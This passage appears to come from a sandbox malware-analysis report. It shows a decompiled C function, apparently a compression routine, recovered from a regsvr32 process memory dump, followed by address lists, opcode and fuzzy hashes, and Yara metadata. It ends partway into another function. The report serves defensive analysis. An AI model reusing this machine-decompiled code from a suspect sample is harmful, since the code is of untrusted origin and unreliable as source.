                                                                                                                                                                                              			E049A8240(intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed short* _v12;
				char _v16;
				signed short _v20;
				unsigned int _v24;
				signed short _v28;
				signed int _t223;
				signed int _t235;
				signed int _t237;
				signed short _t240;
				signed int _t241;
				signed short _t244;
				signed int _t245;
				signed short _t248;
				signed int _t249;
				signed int _t250;
				void* _t254;
				signed char _t259;
				signed int _t275;
				signed int _t289;
				signed int _t308;
				signed short _t316;
				signed int _t321;
				void* _t329;
				signed short _t330;
				signed short _t333;
				signed short _t334;
				signed short _t343;
				signed short _t346;
				signed short _t347;
				signed short _t348;
				signed short _t358;
				signed short _t361;
				signed short _t362;
				signed short _t363;
				signed short _t370;
				signed int _t373;
				signed int _t378;
				signed short _t379;
				signed short _t382;
				unsigned int _t388;
				unsigned short _t390;
				unsigned short _t392;
				unsigned short _t394;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed short _t401;
				signed int _t402;
				signed int _t403;
				signed int _t407;
				signed int _t409;

				_t223 = _a8;
				_t235 =  *(_t223 + 2) & 0x0000ffff;
				_push(_t397);
				_t388 = 0;
				_t398 = _t397 | 0xffffffff;
				if(_a12 < 0) {
					L42:
					return _t223;
				} else {
					_t329 =  !=  ? 7 : 0x8a;
					_v12 = _t223 + 6;
					_t254 = (0 | _t235 != 0x00000000) + 3;
					_v16 = _a12 + 1;
					do {
						_v24 = _t388;
						_t388 = _t388 + 1;
						_a8 = _t235;
						_a12 = _t235;
						_v8 =  *_v12 & 0x0000ffff;
						_t223 = _a4;
						if(_t388 >= _t329) {
							L4:
							if(_t388 >= _t254) {
								if(_a8 == 0) {
									_t122 = _t223 + 0x16bc; // 0xfed1e900
									_t400 =  *_t122;
									if(_t388 > 0xa) {
										_t168 = _t223 + 0xac4; // 0x1cfde808
										_t330 =  *_t168 & 0x0000ffff;
										_t169 = _t223 + 0xac6; // 0x1cfd
										_t237 =  *_t169 & 0x0000ffff;
										_v24 = _t330;
										_t171 = _t223 + 0x16b8; // 0x105bb
										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
										_v28 = _t333;
										if(_t400 <= 0x10 - _t237) {
											_t259 = _t400 + _t237;
										} else {
											_t173 = _t223 + 0x14; // 0xc703f045
											 *(_t223 + 0x16b8) = _t333;
											_t175 = _t223 + 8; // 0x8d000040
											 *((char*)( *_t175 +  *_t173)) = _v28;
											_t223 = _a4;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t181 = _t223 + 0x14; // 0xc703f045
											_t182 = _t223 + 8; // 0x8d000040
											_t183 = _t223 + 0x16b9; // 0x105
											 *((char*)( *_t181 +  *_t182)) =  *_t183;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t333 = _v24 >> 0x10;
											_t189 = _t223 + 0x16bc; // 0xfed1e900
											_t259 =  *_t189 + 0xfffffff0 + _t237;
										}
										_t334 = _t333 & 0x0000ffff;
										 *(_t223 + 0x16bc) = _t259;
										 *(_t223 + 0x16b8) = _t334;
										_t401 = _t334 & 0x0000ffff;
										if(_t259 <= 9) {
											_t209 = _t388 - 0xb; // -10
											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
											 *(_t223 + 0x16bc) = _t259 + 7;
										} else {
											_t193 = _t223 + 8; // 0x8d000040
											_t390 = _t388 + 0xfffffff5;
											_t194 = _t223 + 0x14; // 0xc703f045
											_t240 = _t390 << _t259 | _t401;
											 *(_t223 + 0x16b8) = _t240;
											 *( *_t193 +  *_t194) = _t240;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t199 = _t223 + 0x14; // 0xc703f045
											_t200 = _t223 + 8; // 0x8d000040
											_t201 = _t223 + 0x16b9; // 0x105
											 *((char*)( *_t199 +  *_t200)) =  *_t201;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
											 *(_t223 + 0x16b8) = _t390 >> 0x10;
										}
										goto L35;
									}
									_t123 = _t223 + 0xac0; // 0x75ff0c75
									_t343 =  *_t123 & 0x0000ffff;
									_t124 = _t223 + 0xac2; // 0xe80875ff
									_t241 =  *_t124 & 0x0000ffff;
									_v24 = _t343;
									_t126 = _t223 + 0x16b8; // 0x105bb
									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
									_v28 = _t346;
									if(_t400 > 0x10 - _t241) {
										_t128 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t346;
										_t130 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t130 +  *_t128)) = _v28;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t136 = _t223 + 0x14; // 0xc703f045
										_t137 = _t223 + 8; // 0x8d000040
										_t138 = _t223 + 0x16b9; // 0x105
										 *((char*)( *_t136 +  *_t137)) =  *_t138;
										_t142 = _t223 + 0x16bc; // 0xfed1e900
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t346 = _v24 >> 0x10;
										_t400 =  *_t142 + 0xfffffff0;
									}
									_t403 = _t400 + _t241;
									_t347 = _t346 & 0x0000ffff;
									 *(_t223 + 0x16bc) = _t403;
									 *(_t223 + 0x16b8) = _t347;
									_t348 = _t347 & 0x0000ffff;
									if(_t403 <= 0xd) {
										_t163 = _t403 + 3; // 0xfed1e903
										_t275 = _t163;
										L28:
										 *(_t223 + 0x16bc) = _t275;
										_t165 = _t388 - 3; // -2
										_t166 = _t223 + 0x16b8; // 0x105bb
										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
									} else {
										_t392 = _t388 + 0xfffffffd;
										_t147 = _t223 + 0x14; // 0xc703f045
										_t244 = _t392 << _t403 | _t348;
										_t148 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t244;
										 *( *_t148 +  *_t147) = _t244;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t153 = _t223 + 0x14; // 0xc703f045
										_t154 = _t223 + 8; // 0x8d000040
										_t155 = _t223 + 0x16b9; // 0x105
										 *((char*)( *_t153 +  *_t154)) =  *_t155;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
									}
									goto L35;
								}
								_t289 = _a12;
								if(_t289 != _t398) {
									_t53 = _t289 * 4; // 0x59000000
									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
									_t56 = _t235 * 4; // 0x35e8
									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
									_t58 = _t223 + 0x16bc; // 0xfed1e900
									_t407 =  *_t58;
									_v28 = _t370;
									_t60 = _t223 + 0x16b8; // 0x105bb
									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
									if(_t407 <= 0x10 - _t396) {
										_t373 = _t249;
										_t308 = _t407 + _t396;
									} else {
										_t61 = _t223 + 0x14; // 0xc703f045
										_t62 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t249;
										 *( *_t62 +  *_t61) = _t249;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t67 = _t223 + 0x14; // 0xc703f045
										_t68 = _t223 + 8; // 0x8d000040
										_t69 = _t223 + 0x16b9; // 0x105
										 *((char*)( *_t67 +  *_t68)) =  *_t69;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t75 = _t223 + 0x16bc; // 0xfed1e900
										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
										_t308 =  *_t75 + 0xfffffff0 + _t396;
									}
									_t388 = _v24;
									 *(_t223 + 0x16bc) = _t308;
									 *(_t223 + 0x16b8) = _t373;
								}
								_t80 = _t223 + 0xabc; // 0xff177400
								_t358 =  *_t80 & 0x0000ffff;
								_t81 = _t223 + 0x16bc; // 0xfed1e900
								_t402 =  *_t81;
								_t82 = _t223 + 0xabe; // 0xc75ff17
								_t245 =  *_t82 & 0x0000ffff;
								_v24 = _t358;
								_t84 = _t223 + 0x16b8; // 0x105bb
								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
								_v28 = _t361;
								if(_t402 > 0x10 - _t245) {
									_t86 = _t223 + 0x14; // 0xc703f045
									 *(_t223 + 0x16b8) = _t361;
									_t88 = _t223 + 8; // 0x8d000040
									 *((char*)( *_t88 +  *_t86)) = _v28;
									_t223 = _a4;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t94 = _t223 + 0x14; // 0xc703f045
									_t95 = _t223 + 8; // 0x8d000040
									_t96 = _t223 + 0x16b9; // 0x105
									 *((char*)( *_t94 +  *_t95)) =  *_t96;
									_t100 = _t223 + 0x16bc; // 0xfed1e900
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t361 = _v24 >> 0x10;
									_t402 =  *_t100 + 0xfffffff0;
								}
								_t403 = _t402 + _t245;
								_t362 = _t361 & 0x0000ffff;
								 *(_t223 + 0x16bc) = _t403;
								 *(_t223 + 0x16b8) = _t362;
								_t363 = _t362 & 0x0000ffff;
								if(_t403 <= 0xe) {
									_t121 = _t403 + 2; // 0xfed1e902
									_t275 = _t121;
									goto L28;
								} else {
									_t394 = _t388 + 0xfffffffd;
									_t105 = _t223 + 0x14; // 0xc703f045
									_t248 = _t394 << _t403 | _t363;
									_t106 = _t223 + 8; // 0x8d000040
									 *(_t223 + 0x16b8) = _t248;
									 *( *_t106 +  *_t105) = _t248;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t111 = _t223 + 0x14; // 0xc703f045
									_t112 = _t223 + 8; // 0x8d000040
									_t113 = _t223 + 0x16b9; // 0x105
									 *((char*)( *_t111 +  *_t112)) =  *_t113;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
									goto L35;
								}
							} else {
								_t316 = _t223 + (_t235 + 0x29f) * 4;
								_v28 = _t316;
								do {
									_t378 = _a12;
									_t22 = _t223 + 0x16bc; // 0xfed1e900
									_t409 =  *_t22;
									_t24 = _t378 * 4; // 0x59000000
									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
									_t379 =  *_t316 & 0x0000ffff;
									_v24 = _t379;
									_t27 = _t223 + 0x16b8; // 0x105bb
									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
									_v20 = _t382;
									if(_t409 <= 0x10 - _t250) {
										_t321 = _t409 + _t250;
									} else {
										_t29 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t382;
										_t31 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t31 +  *_t29)) = _v20;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t37 = _t223 + 0x14; // 0xc703f045
										_t38 = _t223 + 8; // 0x8d000040
										_t39 = _t223 + 0x16b9; // 0x105
										 *((char*)( *_t37 +  *_t38)) =  *_t39;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t382 = _v24 >> 0x10;
										_t45 = _t223 + 0x16bc; // 0xfed1e900
										_t321 =  *_t45 + 0xfffffff0 + _t250;
									}
									 *(_t223 + 0x16bc) = _t321;
									_t316 = _v28;
									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
									_t388 = _t388 - 1;
								} while (_t388 != 0);
								L35:
								_t235 = _v8;
								_t388 = 0;
								_t398 = _a12;
								if(_t235 != 0) {
									if(_a8 != _t235) {
										_t329 = 7;
										_t217 = _t329 - 3; // 0x4
										_t254 = _t217;
									} else {
										_t329 = 6;
										_t216 = _t329 - 3; // 0x3
										_t254 = _t216;
									}
								} else {
									_t329 = 0x8a;
									_t214 = _t388 + 3; // 0x3
									_t254 = _t214;
								}
								goto L41;
							}
						}
						_t223 = _a4;
						if(_t235 == _v8) {
							_t235 = _v8;
							goto L41;
						}
						goto L4;
						L41:
						_v12 =  &(_v12[2]);
						_t221 =  &_v16;
						 *_t221 = _v16 - 1;
					} while ( *_t221 != 0);
					goto L42;
				}
			}
























































                                                                                                                                                                                              0x049a8243
                                                                                                                                                                                              0x049a824a
                                                                                                                                                                                              0x049a824e
                                                                                                                                                                                              0x049a8250
                                                                                                                                                                                              0x049a8252
                                                                                                                                                                                              0x049a8258
                                                                                                                                                                                              0x049a8745
                                                                                                                                                                                              0x049a874b
                                                                                                                                                                                              0x049a825e
                                                                                                                                                                                              0x049a826a
                                                                                                                                                                                              0x049a8277
                                                                                                                                                                                              0x049a827a
                                                                                                                                                                                              0x049a8281
                                                                                                                                                                                              0x049a8284
                                                                                                                                                                                              0x049a8287
                                                                                                                                                                                              0x049a828a
                                                                                                                                                                                              0x049a828b
                                                                                                                                                                                              0x049a828e
                                                                                                                                                                                              0x049a8294
                                                                                                                                                                                              0x049a8297
                                                                                                                                                                                              0x049a829c
                                                                                                                                                                                              0x049a82ac
                                                                                                                                                                                              0x049a82ae
                                                                                                                                                                                              0x049a8364
                                                                                                                                                                                              0x049a84f3
                                                                                                                                                                                              0x049a84f3
                                                                                                                                                                                              0x049a84fc
                                                                                                                                                                                              0x049a860f
                                                                                                                                                                                              0x049a860f
                                                                                                                                                                                              0x049a8616
                                                                                                                                                                                              0x049a8616
                                                                                                                                                                                              0x049a861f
                                                                                                                                                                                              0x049a862c
                                                                                                                                                                                              0x049a8635
                                                                                                                                                                                              0x049a8638
                                                                                                                                                                                              0x049a863d
                                                                                                                                                                                              0x049a8685
                                                                                                                                                                                              0x049a863f
                                                                                                                                                                                              0x049a863f
                                                                                                                                                                                              0x049a8642
                                                                                                                                                                                              0x049a8649
                                                                                                                                                                                              0x049a864f
                                                                                                                                                                                              0x049a8652
                                                                                                                                                                                              0x049a8655
                                                                                                                                                                                              0x049a8658
                                                                                                                                                                                              0x049a865b
                                                                                                                                                                                              0x049a865e
                                                                                                                                                                                              0x049a8664
                                                                                                                                                                                              0x049a8672
                                                                                                                                                                                              0x049a8675
                                                                                                                                                                                              0x049a8678
                                                                                                                                                                                              0x049a8681
                                                                                                                                                                                              0x049a8681
                                                                                                                                                                                              0x049a8688
                                                                                                                                                                                              0x049a868b
                                                                                                                                                                                              0x049a8691
                                                                                                                                                                                              0x049a8698
                                                                                                                                                                                              0x049a869e
                                                                                                                                                                                              0x049a86ec
                                                                                                                                                                                              0x049a86f8
                                                                                                                                                                                              0x049a86ff
                                                                                                                                                                                              0x049a86a0
                                                                                                                                                                                              0x049a86a0
                                                                                                                                                                                              0x049a86a3
                                                                                                                                                                                              0x049a86ac
                                                                                                                                                                                              0x049a86af
                                                                                                                                                                                              0x049a86b2
                                                                                                                                                                                              0x049a86b9
                                                                                                                                                                                              0x049a86bc
                                                                                                                                                                                              0x049a86bf
                                                                                                                                                                                              0x049a86c2
                                                                                                                                                                                              0x049a86c5
                                                                                                                                                                                              0x049a86cb
                                                                                                                                                                                              0x049a86d6
                                                                                                                                                                                              0x049a86dc
                                                                                                                                                                                              0x049a86e3
                                                                                                                                                                                              0x049a86e3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a869e
                                                                                                                                                                                              0x049a8502
                                                                                                                                                                                              0x049a8502
                                                                                                                                                                                              0x049a8509
                                                                                                                                                                                              0x049a8509
                                                                                                                                                                                              0x049a8512
                                                                                                                                                                                              0x049a851f
                                                                                                                                                                                              0x049a8528
                                                                                                                                                                                              0x049a852b
                                                                                                                                                                                              0x049a8530
                                                                                                                                                                                              0x049a8532
                                                                                                                                                                                              0x049a8535
                                                                                                                                                                                              0x049a853c
                                                                                                                                                                                              0x049a8542
                                                                                                                                                                                              0x049a8545
                                                                                                                                                                                              0x049a8548
                                                                                                                                                                                              0x049a854b
                                                                                                                                                                                              0x049a854e
                                                                                                                                                                                              0x049a8551
                                                                                                                                                                                              0x049a8557
                                                                                                                                                                                              0x049a8565
                                                                                                                                                                                              0x049a856b
                                                                                                                                                                                              0x049a856e
                                                                                                                                                                                              0x049a8571
                                                                                                                                                                                              0x049a8571
                                                                                                                                                                                              0x049a8574
                                                                                                                                                                                              0x049a8576
                                                                                                                                                                                              0x049a8579
                                                                                                                                                                                              0x049a857f
                                                                                                                                                                                              0x049a8586
                                                                                                                                                                                              0x049a858c
                                                                                                                                                                                              0x049a85e5
                                                                                                                                                                                              0x049a85e5
                                                                                                                                                                                              0x049a85e8
                                                                                                                                                                                              0x049a85e8
                                                                                                                                                                                              0x049a85ee
                                                                                                                                                                                              0x049a85f6
                                                                                                                                                                                              0x049a8603
                                                                                                                                                                                              0x049a858e
                                                                                                                                                                                              0x049a858e
                                                                                                                                                                                              0x049a8599
                                                                                                                                                                                              0x049a859c
                                                                                                                                                                                              0x049a859f
                                                                                                                                                                                              0x049a85a2
                                                                                                                                                                                              0x049a85a9
                                                                                                                                                                                              0x049a85ac
                                                                                                                                                                                              0x049a85af
                                                                                                                                                                                              0x049a85b2
                                                                                                                                                                                              0x049a85b5
                                                                                                                                                                                              0x049a85bb
                                                                                                                                                                                              0x049a85c7
                                                                                                                                                                                              0x049a85cc
                                                                                                                                                                                              0x049a85d9
                                                                                                                                                                                              0x049a85d9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a858c
                                                                                                                                                                                              0x049a836a
                                                                                                                                                                                              0x049a836f
                                                                                                                                                                                              0x049a8375
                                                                                                                                                                                              0x049a8375
                                                                                                                                                                                              0x049a837d
                                                                                                                                                                                              0x049a837d
                                                                                                                                                                                              0x049a8385
                                                                                                                                                                                              0x049a8385
                                                                                                                                                                                              0x049a838d
                                                                                                                                                                                              0x049a839a
                                                                                                                                                                                              0x049a83a3
                                                                                                                                                                                              0x049a83a8
                                                                                                                                                                                              0x049a83ed
                                                                                                                                                                                              0x049a83ef
                                                                                                                                                                                              0x049a83aa
                                                                                                                                                                                              0x049a83aa
                                                                                                                                                                                              0x049a83ad
                                                                                                                                                                                              0x049a83b0
                                                                                                                                                                                              0x049a83b7
                                                                                                                                                                                              0x049a83ba
                                                                                                                                                                                              0x049a83bd
                                                                                                                                                                                              0x049a83c0
                                                                                                                                                                                              0x049a83c3
                                                                                                                                                                                              0x049a83c9
                                                                                                                                                                                              0x049a83d7
                                                                                                                                                                                              0x049a83dd
                                                                                                                                                                                              0x049a83e6
                                                                                                                                                                                              0x049a83e9
                                                                                                                                                                                              0x049a83e9
                                                                                                                                                                                              0x049a83f2
                                                                                                                                                                                              0x049a83f5
                                                                                                                                                                                              0x049a83fb
                                                                                                                                                                                              0x049a83fb
                                                                                                                                                                                              0x049a8402
                                                                                                                                                                                              0x049a8402
                                                                                                                                                                                              0x049a8409
                                                                                                                                                                                              0x049a8409
                                                                                                                                                                                              0x049a8411
                                                                                                                                                                                              0x049a8411
                                                                                                                                                                                              0x049a8418
                                                                                                                                                                                              0x049a8425
                                                                                                                                                                                              0x049a842e
                                                                                                                                                                                              0x049a8431
                                                                                                                                                                                              0x049a8436
                                                                                                                                                                                              0x049a8438
                                                                                                                                                                                              0x049a843b
                                                                                                                                                                                              0x049a8442
                                                                                                                                                                                              0x049a8448
                                                                                                                                                                                              0x049a844b
                                                                                                                                                                                              0x049a844e
                                                                                                                                                                                              0x049a8451
                                                                                                                                                                                              0x049a8454
                                                                                                                                                                                              0x049a8457
                                                                                                                                                                                              0x049a845d
                                                                                                                                                                                              0x049a846b
                                                                                                                                                                                              0x049a8471
                                                                                                                                                                                              0x049a8474
                                                                                                                                                                                              0x049a8477
                                                                                                                                                                                              0x049a8477
                                                                                                                                                                                              0x049a847a
                                                                                                                                                                                              0x049a847c
                                                                                                                                                                                              0x049a847f
                                                                                                                                                                                              0x049a8485
                                                                                                                                                                                              0x049a848c
                                                                                                                                                                                              0x049a8492
                                                                                                                                                                                              0x049a84eb
                                                                                                                                                                                              0x049a84eb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a8494
                                                                                                                                                                                              0x049a8494
                                                                                                                                                                                              0x049a849f
                                                                                                                                                                                              0x049a84a2
                                                                                                                                                                                              0x049a84a5
                                                                                                                                                                                              0x049a84a8
                                                                                                                                                                                              0x049a84af
                                                                                                                                                                                              0x049a84b2
                                                                                                                                                                                              0x049a84b5
                                                                                                                                                                                              0x049a84b8
                                                                                                                                                                                              0x049a84bb
                                                                                                                                                                                              0x049a84c1
                                                                                                                                                                                              0x049a84cd
                                                                                                                                                                                              0x049a84d2
                                                                                                                                                                                              0x049a84df
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a84df
                                                                                                                                                                                              0x049a82b4
                                                                                                                                                                                              0x049a82ba
                                                                                                                                                                                              0x049a82bd
                                                                                                                                                                                              0x049a82c0
                                                                                                                                                                                              0x049a82c0
                                                                                                                                                                                              0x049a82c3
                                                                                                                                                                                              0x049a82c3
                                                                                                                                                                                              0x049a82c9
                                                                                                                                                                                              0x049a82c9
                                                                                                                                                                                              0x049a82d1
                                                                                                                                                                                              0x049a82d6
                                                                                                                                                                                              0x049a82e3
                                                                                                                                                                                              0x049a82ec
                                                                                                                                                                                              0x049a82ef
                                                                                                                                                                                              0x049a82f4
                                                                                                                                                                                              0x049a833c
                                                                                                                                                                                              0x049a82f6
                                                                                                                                                                                              0x049a82f6
                                                                                                                                                                                              0x049a82f9
                                                                                                                                                                                              0x049a8300
                                                                                                                                                                                              0x049a8306
                                                                                                                                                                                              0x049a8309
                                                                                                                                                                                              0x049a830c
                                                                                                                                                                                              0x049a830f
                                                                                                                                                                                              0x049a8312
                                                                                                                                                                                              0x049a8315
                                                                                                                                                                                              0x049a831b
                                                                                                                                                                                              0x049a8329
                                                                                                                                                                                              0x049a832c
                                                                                                                                                                                              0x049a832f
                                                                                                                                                                                              0x049a8338
                                                                                                                                                                                              0x049a8338
                                                                                                                                                                                              0x049a8342
                                                                                                                                                                                              0x049a8348
                                                                                                                                                                                              0x049a834b
                                                                                                                                                                                              0x049a8352
                                                                                                                                                                                              0x049a8352
                                                                                                                                                                                              0x049a8705
                                                                                                                                                                                              0x049a8705
                                                                                                                                                                                              0x049a8708
                                                                                                                                                                                              0x049a870a
                                                                                                                                                                                              0x049a870f
                                                                                                                                                                                              0x049a871e
                                                                                                                                                                                              0x049a872a
                                                                                                                                                                                              0x049a872f
                                                                                                                                                                                              0x049a872f
                                                                                                                                                                                              0x049a8720
                                                                                                                                                                                              0x049a8720
                                                                                                                                                                                              0x049a8725
                                                                                                                                                                                              0x049a8725
                                                                                                                                                                                              0x049a8725
                                                                                                                                                                                              0x049a8711
                                                                                                                                                                                              0x049a8711
                                                                                                                                                                                              0x049a8716
                                                                                                                                                                                              0x049a8716
                                                                                                                                                                                              0x049a8716
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a870f
                                                                                                                                                                                              0x049a82ae
                                                                                                                                                                                              0x049a82a3
                                                                                                                                                                                              0x049a82a6
                                                                                                                                                                                              0x049a8734
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a8734
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a8737
                                                                                                                                                                                              0x049a8737
                                                                                                                                                                                              0x049a873b
                                                                                                                                                                                              0x049a873b
                                                                                                                                                                                              0x049a873b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a8284

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
                                                                                                                                                                                              • Instruction ID: 7a80be8b46ba2d14592aad7131e28254958282b5a3a1b621f1de6ac64991e1d3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
                                                                                                                                                                                              • Instruction Fuzzy Hash: 32F17E756092118FC709CF19C4D48F67BF5EFA9310B1E82F9D8899B3A6D731A980CB91
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 049A6350 Relevance: .2, Instructions: 190COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0b291a34d391eb53e104c3bb92411f247d9b71c7fc3051bd8933d473d1f13197
                                                                                                                                                                                              • Instruction ID: 95e09e6fbfa7b0fbf2976b799ca9f26b040a263907489d5b0436e190a756686b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b291a34d391eb53e104c3bb92411f247d9b71c7fc3051bd8933d473d1f13197
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F717571A241654FD7C4CE2EE8D0476BBE1EB8A311345453AEA85CB285D538FD3ACBE0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 049A2988 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: f0ee965db1a1681f8a912e564e27551fccd8d14729321f810e849d4b8eef2dc9
                                                                                                                                                                                              • Instruction ID: 1d55662f0042f0a41f1561ef775a264ef33cf83975ac87be5f754d932374b468
                                                                                                                                                                                              • Opcode Fuzzy Hash: f0ee965db1a1681f8a912e564e27551fccd8d14729321f810e849d4b8eef2dc9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 475169B3B041B00BDF688E3D8C642757ED25AD505670EC2B6F9A9CF24AE878C7159760
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 049A358D Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 411164ce4a6ad35deaf48103b0284f17fd2f859166e99e87975b503efb4398b7
                                                                                                                                                                                              • Instruction ID: 4279a100a1f6a24c4c7c30928a241c0808f97a517e16e4ced543b17969b4f7c1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 411164ce4a6ad35deaf48103b0284f17fd2f859166e99e87975b503efb4398b7
                                                                                                                                                                                              • Instruction Fuzzy Hash: CA214F366144128BD75CCF2CD4A6A69F3A5FB88310F45427ED91BCB682CB65F452CBC0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499EA4A Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                              			E0499EA4A(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
